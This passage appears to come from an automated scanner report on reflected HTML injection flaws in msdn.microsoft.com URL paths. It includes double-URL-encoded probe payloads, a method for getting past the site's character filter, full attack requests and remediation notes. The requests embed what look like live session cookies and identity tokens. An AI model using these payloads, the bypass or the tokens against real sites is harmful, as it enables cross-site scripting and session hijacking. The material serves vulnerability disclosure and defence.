17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfc097"><a>0c9278f4fd1/aa155073" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67843%2522%253e%253ca%253ee5b048815e6 was submitted in the REST URL parameter 3. This input was echoed as 67843"><a>e5b048815e6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa155073.aspx67843%2522%253e%253ca%253ee5b048815e6 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155073.aspx67843"><a>e5b048815e6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83582%2522%253e%253ca%253e41cf0a39ac3 was submitted in the REST URL parameter 1. This input was echoed as 83582"><a>41cf0a39ac3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us83582%2522%253e%253ca%253e41cf0a39ac3/library/aa187916.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us83582"><a>41cf0a39ac3/library/aa187916" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2c1%2522%253e%253ca%253ed10d1626b7c was submitted in the REST URL parameter 2. This input was echoed as da2c1"><a>d10d1626b7c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryda2c1%2522%253e%253ca%253ed10d1626b7c/aa187916.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryda2c1"><a>d10d1626b7c/aa187916" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e58%2522%253e%253ca%253eb41c43eaea6 was submitted in the REST URL parameter 3. This input was echoed as 56e58"><a>b41c43eaea6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa187916.aspx56e58%2522%253e%253ca%253eb41c43eaea6 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa187916.aspx56e58"><a>b41c43eaea6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757a2%2522%253e%253ca%253e39c3f7167ab was submitted in the REST URL parameter 1. This input was echoed as 757a2"><a>39c3f7167ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us757a2%2522%253e%253ca%253e39c3f7167ab/library/bb726434(office.12 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9220 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:45 GMT
